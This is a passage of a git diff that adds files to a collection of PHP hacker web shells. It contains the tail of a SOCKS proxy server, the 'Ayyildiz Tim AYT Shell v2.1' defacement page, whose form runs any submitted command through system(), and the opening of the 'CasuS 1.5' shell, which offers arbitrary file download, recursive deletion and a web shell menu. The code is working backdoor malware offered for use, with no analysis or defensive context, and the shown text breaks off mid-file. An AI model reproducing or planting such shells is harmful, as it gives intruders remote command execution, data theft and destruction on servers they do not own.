||||
|
||||
if(!isset($reqmessage[$id][1]))
|
||||
return NOT_ALL_DATA;
|
||||
if($reqmessage[$id][1] !== CONNECT)
|
||||
{
|
||||
socket_getsockname ($clientsockets[$id], $addr, $port);
|
||||
$addr = explode('.', $addr);
|
||||
for($i = 0; $i < 4; $i++)
|
||||
$addr[$i] = chr($addr[$i]);
|
||||
$addr = implode('', $addr);
|
||||
sendstring($clientsockets[$id], VER.REP_WRONG_COMMAND."\x00\x01\x00".
|
||||
"\x00\x00\x00\x00\x00");
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
if(!isset($reqmessage[$id][2]))
|
||||
return NOT_ALL_DATA;
|
||||
if($reqmessage[$id][2] !== "\x00")
|
||||
{
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
|
||||
if(!isset($reqmessage[$id][3]))
|
||||
return NOT_ALL_DATA;
|
||||
|
||||
if($reqmessage[$id][3] !== DOMAIN && $reqmessage[$id][3] !== IPv4)
|
||||
{
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
if(!isset($reqmessage[$id][4]))
|
||||
return NOT_ALL_DATA;
|
||||
if($reqmessage[$id][3] === DOMAIN){
|
||||
$reqlen = ord($reqmessage[$id][4])+1;
|
||||
if(!isset($reqmessage[$id][3+$reqlen]))
|
||||
return NOT_ALL_DATA;
|
||||
$host = substr($reqmessage[$id], 5, $reqlen-1);
|
||||
|
||||
}
|
||||
else{ // IP v4
|
||||
$reqlen = 4;
|
||||
if(!isset($reqmessage[$id][3+$reqlen]))
|
||||
return NOT_ALL_DATA;
|
||||
$host = base_convert(bin2hex($reqmessage[$id][4]), 16, 10).'.'.
|
||||
base_convert(bin2hex($reqmessage[$id][5]), 16, 10).'.'.
|
||||
base_convert(bin2hex($reqmessage[$id][6]), 16, 10).'.'.
|
||||
base_convert(bin2hex($reqmessage[$id][7]), 16, 10);
|
||||
}
|
||||
if(!isset($reqmessage[$id][3+$reqlen+2]))
|
||||
return NOT_ALL_DATA;
|
||||
socket_getsockname ($clientsockets[$id], $self_addr, $self_port);
|
||||
|
||||
$self_addr = explode('.', $self_addr);
|
||||
for($i = 0; $i < 4; $i++)
|
||||
$self_addr[$i] = chr($self_addr[$i]);
|
||||
$self_add = implode('', $self_addr);
|
||||
$self_port = pack('n', $self_port);
|
||||
$ipport[$id] = $self_add.$self_port;
|
||||
|
||||
if(in_array($host, $blocked_hosts)){
|
||||
|
||||
sendstring($clientsockets[$id], VER.REP_BLOCKED_HOST."\x00\x01".$ipport[$id]);
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);
|
||||
// Connection to remote host
|
||||
|
||||
$serversockets[$id] = socket_create(AF_INET, SOCK_STREAM, 6 /* TCP*/);
|
||||
if($serversockets[$id] === FALSE){
|
||||
|
||||
sendstring($clientsockets[$id], VER.REP_SOCKS_ERROR."\x00\x01".$ipport[$id]);
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
socket_set_nonblock($serversockets[$id]);
|
||||
//echo $host.':'.$port;
|
||||
socket_connect($serversockets[$id], $host, $port);
|
||||
unset($reqmessage[$id]);
|
||||
$sockets_status[$id] = STATUS_CONNECTING;
|
||||
|
||||
}
|
||||
|
||||
function Authorization($id){
|
||||
global $serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
|
||||
$timeout;
|
||||
$message = '';
|
||||
if(($message = getstring($clientsockets[$id], 100)) === CLOSED_SOCKET){
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
elseif($message === NO_DATA)
|
||||
return NOT_ALL_DATA;
|
||||
@$reqmessage[$id] .= $message;
|
||||
if($reqmessage[$id][0] != "\x01"){
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
if(!isset($reqmessage[$id][1]))
|
||||
return NOT_ALL_DATA;
|
||||
|
||||
$pos = ord($reqmessage[$id][1])+2;
|
||||
if(!isset($reqmessage[$id][$pos]))
|
||||
return NOT_ALL_DATA;
|
||||
if(!isset($reqmessage[$id][$pos+ord($reqmessage[$id][$pos])]))
|
||||
return NOT_ALL_DATA;
|
||||
|
||||
// Authorization
|
||||
if($settings['LOGIN'] === substr($reqmessage[$id], 2, ord($reqmessage[$id][1]))
|
||||
&& $settings['PASSWORD'] === substr($reqmessage[$id], $pos+1,
|
||||
ord($reqmessage[$id][$pos])))
|
||||
{
|
||||
$timeout[$id] = time();
|
||||
unset($reqmessage[$id]);
|
||||
$sockets_status[$id] = STATUS_REQUESTRECV;
|
||||
sendstring($clientsockets[$id], "\x01\x00");
|
||||
}
|
||||
else{
|
||||
sendstring($clientsockets[$id], "\x01\x01");
|
||||
close($id);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function close($id){
|
||||
global $serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
|
||||
$timeout, $ipport;
|
||||
socket_getpeername($clientsockets[$id], $ip);
|
||||
@socket_close($clientsockets[$id]);
|
||||
unset($clientsockets[$id]);
|
||||
@socket_close($serversockets[$id]);
|
||||
unset($serversockets[$id]);
|
||||
unset($sockets_status[$id]);
|
||||
unset($timeout[$id]);
|
||||
unset($ipport[$id]);
|
||||
|
||||
makelog($ip.' disconnected.');
|
||||
}
|
||||
|
||||
function Start($id){
|
||||
global $serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
|
||||
$timeout;
|
||||
$message = '';
|
||||
if(($message = getstring($clientsockets[$id], 10)) === CLOSED_SOCKET){
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
|
||||
elseif($message === NO_DATA)
|
||||
return NOT_ALL_DATA;
|
||||
@$reqmessage[$id] .= $message;
|
||||
// Checking the packet
|
||||
if($reqmessage[$id][0] !== VER){
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
|
||||
if(!isset($reqmessage[$id][1]))
|
||||
return NOT_ALL_DATA;
|
||||
|
||||
if(ord($reqmessage[$id][1]) > strlen($reqmessage[$id]) - 2)
|
||||
return NOT_ALL_DATA;
|
||||
elseif(ord($reqmessage[$id][1]) === strlen($reqmessage[$id]) - 2){
|
||||
if($settings['AUTH'] !== 1){
|
||||
sendstring($clientsockets[$id], VER.AUTH_NOT_REQ);
|
||||
unset($reqmessage[$id]);
|
||||
$sockets_status[$id] = STATUS_REQUESTRECV;
|
||||
$timeout[$id] = time();
|
||||
return 0;
|
||||
}
|
||||
|
||||
if(strstr(substr($reqmessage[$id], 2, ord($reqmessage[$id][1])), AUTH_METHOD))
|
||||
{
|
||||
$timeout[$id] = time();
|
||||
$sockets_status[$id] = STATUS_RECVAUTHREQ;
|
||||
sendstring($clientsockets[$id], VER.AUTH_METHOD);
|
||||
unset($reqmessage[$id]);
|
||||
return 0;
|
||||
}
|
||||
else{
|
||||
sendstring($clientsockets[$id], VER.WRONG_AUTH_METHODS);
|
||||
return 0;
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
$sockets_status[$id] = STATUS_REQUEST;
|
||||
return 0;
|
||||
}
|
||||
else{
|
||||
close($id);
|
||||
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
}
|
||||
|
||||
function one_array($f, $s){
|
||||
$new_array = array();
|
||||
foreach($f as $elt)
|
||||
if(!in_array($elt, $s))
|
||||
array_push($new_array, $elt);
|
||||
return array_merge_recursive($new_array, $s);
|
||||
|
||||
}
|
||||
|
||||
function makelog($string){
|
||||
global $settings;
|
||||
if($settings['LOG_FILE'] == -1)
|
||||
return FALSE;
|
||||
$fp = fopen($settings['LOG_FILE'], 'a');
|
||||
fputs($fp, date("d.m.Y. H:i:s").' '.$string."\r\n".
|
||||
"---------------------------------------------------------\r\n");
|
||||
fclose($fp);
|
||||
}
|
||||
|
||||
function stop(){
|
||||
global $serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
|
||||
$timeout;
|
||||
for($i = 0; $i < sizeof($clientsockets); $i++)
|
||||
close($i);
|
||||
makelog('Finish!: '.$string);
|
||||
DIE();
|
||||
}
|
||||
|
||||
function error($string){
|
||||
makelog('<<ERROR>>: '.$string);
|
||||
stop();
|
||||
DIE();
|
||||
}
|
||||
/*-------------------------------------------------------------------------------------*/
|
||||
|
||||
/*-------------------------------------------------------------------------------------*\
|
||||
| P R O G R A M M |
|
||||
\*-------------------------------------------------------------------------------------*/
|
||||
|
||||
$sock = socket_create(AF_INET, SOCK_STREAM, 6 /* TCP*/) OR
|
||||
DIE(socket_strerror(socket_last_error()));
|
||||
if(!socket_bind($sock, "0.0.0.0", $settings['PORT']))
|
||||
error(socket_strerror(socket_last_error($sock)));
|
||||
|
||||
if(!socket_listen ($sock))
|
||||
error(socket_strerror(socket_last_error($sock)));
|
||||
socket_set_nonblock($sock);
|
||||
$maxcount = $settings['MAX_CONNECTIONS'] + 1;
|
||||
$sock = array($sock);
|
||||
|
||||
while(TRUE){
|
||||
|
||||
$readed = $wr = array_merge($sock, $clientsockets);
|
||||
if(socket_select($readed, $wr, $exc = NULL, 7) < 1){
|
||||
|
||||
if(file_exists($settings['STOPFILE']))
|
||||
stop();
|
||||
continue;
|
||||
}
|
||||
if (in_array($sock[0], $readed)){
|
||||
$clientsockets[] = ($cl_sock = socket_accept($sock[0]));
|
||||
socket_getpeername($cl_sock, $ip);
|
||||
makelog($ip.' connected to server.');
|
||||
$id = array_search($cl_sock, $clientsockets);
|
||||
if(count($clientsockets) >= $maxcount){
|
||||
socket_close($cl_sock);
|
||||
unset($clientsockets[$id]);
|
||||
makelog('Connection with '.$ip.' has been aborted by server. '.
|
||||
'Reason: too many connections.');
|
||||
}
|
||||
elseif(in_array($ip, $blocked_users)){
|
||||
socket_close($newsock);
|
||||
unset($clientsockets[$id]);
|
||||
makelog('Connection with '.$ip.' has been aborted by server. '.
|
||||
'Reason: banned user.');
|
||||
}
|
||||
else{
|
||||
socket_set_nonblock($cl_sock);
|
||||
$sockets_status[$id] = STATUS_RECVSTARTREQ;
|
||||
}
|
||||
|
||||
$key = array_search($sock[0], $readed);
|
||||
unset($readed[$key]);
|
||||
}
|
||||
$array_status = one_array($readed, $wr);
|
||||
foreach($array_status as $socket){
|
||||
$id = array_search($socket, $clientsockets);
|
||||
if($id === FALSE)
|
||||
$id = array_search($socket, $serversockets);
|
||||
if($id === FALSE)
|
||||
continue;
|
||||
switch ($sockets_status[$id]){
|
||||
case STATUS_RECVAUTHREQ:
|
||||
if(time() - $timeout[$id] > $settings['AUTH_TIMEOUT'])
|
||||
{ //echo 'aaaaa';
|
||||
close($id);
|
||||
break;
|
||||
}
|
||||
Authorization($id);
|
||||
break;
|
||||
case STATUS_REQUESTRECV:
|
||||
|
||||
BridgeEstablish1($id);
|
||||
break;
|
||||
case STATUS_RECVSTARTREQ:
|
||||
Start($id);
|
||||
|
||||
break;
|
||||
case STATUS_CONNECTING:
|
||||
|
||||
if(time() - $timeout[$id] > $settings['CONNECT_TIMEOUT'])
|
||||
{
|
||||
sendstring($clientsockets[$id], VER.REP_BAD_HOST.
|
||||
"\x00\x01".$ipport[$id]);
|
||||
close($id);
|
||||
break;
|
||||
}
|
||||
// checkin remote host
|
||||
$exr = $ewr = array($serversockets[$id]);
|
||||
if(socket_select($exr, $ewr, $exc = NULL, 0) > 0)
|
||||
BridgeEstablish2($id);
|
||||
break;
|
||||
default: // STATUS_WORKING
|
||||
$mes= getstring($clientsockets[$id], 8024);
|
||||
if($mes === CLOSED_SOCKET){
|
||||
close($id);
|
||||
break;
|
||||
}
|
||||
if($mes !== NO_DATA)
|
||||
if(sendstring($serversockets[$id], $mes) === FALSE){
|
||||
close($id);
|
||||
break;
|
||||
}
|
||||
$mes = getstring($serversockets[$id], 8024);
|
||||
if($mes === CLOSED_SOCKET){
|
||||
close($id);
|
||||
break;
|
||||
}
|
||||
if($mes !== NO_DATA)
|
||||
if(sendstring($clientsockets[$id], $mes) === FALSE){
|
||||
close($id);
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
}
|
||||
if(rand(1,5) == 5)
|
||||
if(file_exists($settings['STOPFILE']))
|
||||
stop();
|
||||
}
|
||||
|
||||
/*-------------------------------------------------------------------------------------*/
|
||||
?>
|
||||
|
||||
|
317
xakep-shells/PHP/Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt
Normal file
317
xakep-shells/PHP/Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt
Normal file
|
@ -0,0 +1,317 @@
|
|||
<html>
|
||||
|
||||
<head>
|
||||
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
|
||||
<meta name="ProgId" content="FrontPage.Editor.Document">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<title>Ayyildiz Tim | AYT | Shell v 2.1 Biz Büyük Türk Milletinin Hizmetindeyiz...</title>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
||||
<html>
|
||||
<head>
|
||||
<meta name="distribution" content="GLOBAL">
|
||||
<META name="ROBOTS" content="ALL">
|
||||
<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
|
||||
<meta name="Copyright" content=TouCh By iJOo">
|
||||
<META NAME="RATING" CONTENT="GENERAL">
|
||||
<meta name="Description" content="Thehacker">
|
||||
<meta name="KeyWords" content="DefaCed">
|
||||
<title>HACKED BY AYYILDIZ ™</title>
|
||||
<STYLE TYPE="text/css">
|
||||
<!--
|
||||
|
||||
body {
|
||||
scrollbar-3d-light-color : #404040;
|
||||
scrollbar-arrow-color: black;
|
||||
scrollbar-base-color: black;
|
||||
scrollbar-darkshadow-color: #404040;
|
||||
scrollbar-face-color: black;
|
||||
scrollbar-highlight-color: #404040;
|
||||
scrollbar-shadow-color: black;
|
||||
scrollbar-track-color: #404040; }
|
||||
-->
|
||||
</STYLE>
|
||||
<script language="JavaScript1.2">
|
||||
function disableselect(e){
|
||||
return false
|
||||
}
|
||||
function reEnable(){
|
||||
return true
|
||||
}
|
||||
//if IE4+
|
||||
document.onselectstart=new Function ("return false")
|
||||
//if NS6
|
||||
if (window.sidebar){
|
||||
document.onmousedown=disableselect
|
||||
document.onclick=reEnable
|
||||
}
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
|
||||
<bgsound src="bayrak.mp3" loop="infinite">
|
||||
|
||||
<center><font color="red" size="10" face="Imprint MT Shadow">
|
||||
</font>
|
||||
<TR>
|
||||
<TD vAlign=center align=left width=144>
|
||||
<SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
|
||||
</TD>
|
||||
<TD vAlign=center align=left width=5></TD>
|
||||
<TD width=470><BR>
|
||||
<P align=left></P></TD></TR>
|
||||
<TR>
|
||||
<TD vAlign=center align=left width=144></TD>
|
||||
<TD vAlign=center align=left width=5></TD>
|
||||
<TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
|
||||
<STYLE>BODY {
|
||||
BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
|
||||
}
|
||||
.ldtab1 {
|
||||
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
|
||||
}
|
||||
.ldtab2 {
|
||||
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
|
||||
}
|
||||
.ldtab3 {
|
||||
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
|
||||
}
|
||||
.ldtxt1 {
|
||||
PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
|
||||
}
|
||||
.ldtxt2 {
|
||||
FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
|
||||
}
|
||||
A:link {
|
||||
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
|
||||
}
|
||||
A:visited {
|
||||
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
|
||||
}
|
||||
A:active {
|
||||
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
|
||||
}
|
||||
A:hover {
|
||||
BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
|
||||
}
|
||||
A {
|
||||
TEXT-DECORATION: none
|
||||
}
|
||||
</STYLE>
|
||||
<!-- MELEK -->
|
||||
<DIV align=center>
|
||||
<DIV id=welle
|
||||
style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT
|
||||
color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT
|
||||
color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT
|
||||
color=#ff0000></DIV></DIV>
|
||||
<DIV align=center></DIV>
|
||||
<SCRIPT language=JavaScript>
|
||||
|
||||
<!--
|
||||
function welle()
|
||||
{
|
||||
if(document.all.welle.filters[0].freq > 10)
|
||||
document.all.welle.filters[0].freq = 5;
|
||||
document.all.welle.filters[0].freq += 1;
|
||||
if(document.all.welle.filters[0].phase > 100)
|
||||
document.all.welle.filters[0].phase = 0;
|
||||
document.all.welle.filters[0].phase += 10;
|
||||
if(document.all.welle.filters[0].strength > 10)
|
||||
document.all.welle.filters[0].strength = 1;
|
||||
document.all.welle.filters[0].strength += 1;
|
||||
window.setTimeout("welle()",100);
|
||||
}
|
||||
welle();
|
||||
file://-->
|
||||
</SCRIPT>
|
||||
</FONT></TD></TR></TBODY></TABLE></DIV>
|
||||
|
||||
|
||||
<?php
|
||||
|
||||
define('PHPSHELL_VERSION', '');
|
||||
|
||||
?>
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
|
||||
<style type="text/css">
|
||||
<!--
|
||||
.style1 {color: #FF0000}
|
||||
.style2 {
|
||||
font-family: Tahoma;
|
||||
font-size: 9px;
|
||||
font-weight: bold;
|
||||
}
|
||||
-->
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div align="center">
|
||||
<table width="918" height="484" border="15">
|
||||
<tr>
|
||||
<td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
|
||||
<div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span> <?php
|
||||
|
||||
if (ini_get('register_globals') != '1') {
|
||||
/* We'll register the variables as globals: */
|
||||
if (!empty($HTTP_POST_VARS))
|
||||
extract($HTTP_POST_VARS);
|
||||
|
||||
if (!empty($HTTP_GET_VARS))
|
||||
extract($HTTP_GET_VARS);
|
||||
|
||||
if (!empty($HTTP_SERVER_VARS))
|
||||
extract($HTTP_SERVER_VARS);
|
||||
}
|
||||
|
||||
/* First we check if there has been asked for a working directory. */
|
||||
if (!empty($work_dir)) {
|
||||
/* A workdir has been asked for */
|
||||
if (!empty($command)) {
|
||||
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
|
||||
/* We try and match a cd command. */
|
||||
if ($regs[1][0] == '/') {
|
||||
$new_dir = $regs[1]; // 'cd /something/...'
|
||||
} else {
|
||||
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
|
||||
}
|
||||
if (file_exists($new_dir) && is_dir($new_dir)) {
|
||||
$work_dir = $new_dir;
|
||||
}
|
||||
unset($command);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (file_exists($work_dir) && is_dir($work_dir)) {
|
||||
/* We change directory to that dir: */
|
||||
chdir($work_dir);
|
||||
}
|
||||
|
||||
/* We now update $work_dir to avoid things like '/foo/../bar': */
|
||||
$work_dir = exec('pwd');
|
||||
|
||||
?>
|
||||
</div>
|
||||
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
|
||||
<p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
|
||||
<?php
|
||||
|
||||
$work_dir_splitted = explode('/', substr($work_dir, 1));
|
||||
|
||||
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
|
||||
|
||||
if (!empty($work_dir_splitted[0])) {
|
||||
$path = '';
|
||||
for ($i = 0; $i < count($work_dir_splitted); $i++) {
|
||||
$path .= '/' . $work_dir_splitted[$i];
|
||||
printf('<a href="%s?work_dir=%s">%s</a>/',
|
||||
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
</b></p>
|
||||
<p align="center"><strong>Dizin Degistir</strong> :
|
||||
<select name="work_dir" onChange="this.form.submit()">
|
||||
<?php
|
||||
/* Now we make a list of the directories. */
|
||||
$dir_handle = opendir($work_dir);
|
||||
/* Run through all the files and directories to find the dirs. */
|
||||
while ($dir = readdir($dir_handle)) {
|
||||
if (is_dir($dir)) {
|
||||
if ($dir == '.') {
|
||||
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
|
||||
} elseif ($dir == '..') {
|
||||
/* We have found the parent dir. We must be carefull if the parent
|
||||
directory is the root directory (/). */
|
||||
if (strlen($work_dir) == 1) {
|
||||
/* work_dir is only 1 charecter - it can only be / There's no
|
||||
parent directory then. */
|
||||
} elseif (strrpos($work_dir, '/') == 0) {
|
||||
/* The last / in work_dir were the first charecter.
|
||||
This means that we have a top-level directory
|
||||
eg. /bin or /home etc... */
|
||||
echo "<option value=\"/\">Parent Directory</option>\n";
|
||||
} else {
|
||||
/* We do a little bit of string-manipulation to find the parent
|
||||
directory... Trust me - it works :-) */
|
||||
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
|
||||
}
|
||||
} else {
|
||||
if ($work_dir == '/') {
|
||||
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
|
||||
} else {
|
||||
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
closedir($dir_handle);
|
||||
|
||||
?>
|
||||
</select>
|
||||
</p>
|
||||
<p align="center"><strong>Komut</strong>:
|
||||
<input type="text" name="command" size="60">
|
||||
<input name="submit_btn" type="submit" value="Komut Calistir">
|
||||
</p>
|
||||
<p align="center"><strong>Surekli Bagli Kal</strong>
|
||||
<input type="checkbox" name="stderr">
|
||||
</p>
|
||||
|
||||
<div align="center">
|
||||
<textarea name="textarea" cols="80" rows="20" readonly>
|
||||
|
||||
<?php
|
||||
if (!empty($command)) {
|
||||
if ($stderr) {
|
||||
$tmpfile = tempnam('/tmp', 'phpshell');
|
||||
$command .= " 1> $tmpfile 2>&1; " .
|
||||
"cat $tmpfile; rm $tmpfile";
|
||||
} else if ($command == 'ls') {
|
||||
/* ls looks much better with ' -F', IMHO. */
|
||||
$command .= ' -F';
|
||||
}
|
||||
system($command);
|
||||
}
|
||||
?>
|
||||
|
||||
</textarea>
|
||||
</div>
|
||||
</form>
|
||||
<div align="center">
|
||||
<script language="JavaScript" type="text/javascript">
|
||||
document.forms[0].command.focus();
|
||||
</script>
|
||||
</div> <hr align="center"> <p align="center" class="style2">Copyright © 2006–2007, Powered byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
|
||||
<p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
|
||||
<p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
|
||||
</font></font></font></font></font></font></font></font></font></font></font>
|
||||
</font>
|
||||
|
||||
|
||||
<!--
|
||||
/*
|
||||
I Always Love Sha
|
||||
*/
|
||||
|
||||
</BODY></HTML>
|
368
xakep-shells/PHP/Casus15.php.php.txt
Normal file
368
xakep-shells/PHP/Casus15.php.php.txt
Normal file
|
@ -0,0 +1,368 @@
|
|||
<?php
|
||||
$default=$DOCUMENT_ROOT;
|
||||
$this_file="./casus15.php";
|
||||
|
||||
|
||||
|
||||
if(isset($save)){
|
||||
$fname=str_replace(" ","_",$fname);
|
||||
$fname=str_replace("%20","_",$fname);
|
||||
header("Cache-control: private");
|
||||
header("Content-type: application/force-download");
|
||||
header("Content-Length: ".filesize($save));
|
||||
header("Content-Disposition: attachment; filename=$fname");
|
||||
|
||||
$fp = fopen($save, 'r');
|
||||
fpassthru($fp);
|
||||
fclose($fp);
|
||||
unset($save);
|
||||
exit;
|
||||
}
|
||||
|
||||
if ( function_exists('ini_get') ) {
|
||||
$onoff = ini_get('register_globals');
|
||||
} else {
|
||||
$onoff = get_cfg_var('register_globals');
|
||||
}
|
||||
if ($onoff != 1) {
|
||||
@extract($_POST, EXTR_SKIP);
|
||||
@extract($_GET, EXTR_SKIP);
|
||||
}
|
||||
|
||||
|
||||
function deltree($deldir) {
|
||||
$mydir=@dir($deldir);
|
||||
while($file=$mydir->read()) {
|
||||
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
|
||||
@chmod("$deldir/$file",0777);
|
||||
deltree("$deldir/$file");
|
||||
}
|
||||
if (is_file("$deldir/$file")) {
|
||||
@chmod("$deldir/$file",0777);
|
||||
@unlink("$deldir/$file");
|
||||
}
|
||||
}
|
||||
$mydir->close();
|
||||
@chmod("$deldir",0777);
|
||||
echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SYLYNDY:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
|
||||
}
|
||||
|
||||
if ($op=='phpinfo'){
|
||||
$fonk_kap = get_cfg_var("fonksiyonlary_kapat");
|
||||
echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çaly?myyiii</center>";
|
||||
exit;
|
||||
}
|
||||
|
||||
if ($op=='me'){
|
||||
echo "<html>
|
||||
<head>
|
||||
<title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
|
||||
</head>
|
||||
<body bgcolor='#000000' text='#0000FF' link='#0000FF' vlink='#0000FF' alink='#00FF00'>
|
||||
<center>Fazla söze gerek yok...</center>
|
||||
<center><br>O yanlyz bir kovboy,<br>
|
||||
<br>O cehennemden çykan çylgyn TÜRK,<br>
|
||||
<br>O bir rap manya?y,<br>
|
||||
<br>O bir php coder,<br>
|
||||
<br>O'nun hackten daha çok sevdi?i tek ?ey iki hack,<br>
|
||||
<br>O...<br>
|
||||
<br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
|
||||
<br></center>";
|
||||
|
||||
$sayi='7';
|
||||
while($sayi>=1){
|
||||
echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'> EFENDISI</font> <font color='#FF0000'>MAFIABOY</font> </font></center>";
|
||||
$sayi--;
|
||||
}
|
||||
$sayi2='1';
|
||||
while($sayi2<=7){
|
||||
echo "<center><font size='$sayi2' color='#008000'>baddog@hotmail.com</font></center>";
|
||||
$sayi2++;
|
||||
};
|
||||
|
||||
echo "</body>
|
||||
</html>";
|
||||
exit;
|
||||
}
|
||||
|
||||
|
||||
echo "<html>
|
||||
<head>
|
||||
<title>CasuS 1.5 by MafiABoY</title>
|
||||
</head>
|
||||
|
||||
<body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
|
||||
</body>";
|
||||
|
||||
echo "<center><font size='+3' color='#FF0000'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
|
||||
<center><font size='+2' color='#FFFFFF'>A TURKISH </font><font size='+2' color='#FF0000'>HACKER</font><br>
|
||||
<br>";
|
||||
echo "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
|
||||
echo "<br>";
|
||||
echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
|
||||
echo "<br>";
|
||||
echo "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB SHELL</a></center>";
|
||||
echo "<br>
|
||||
<br>
|
||||
<br>";
|
||||
echo "<center>---><a href='./$this_file?op=me' target='_blank'>MafiABoY</a><---</center>";
|
||||
|
||||
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||
echo "<div align=center>
|
||||
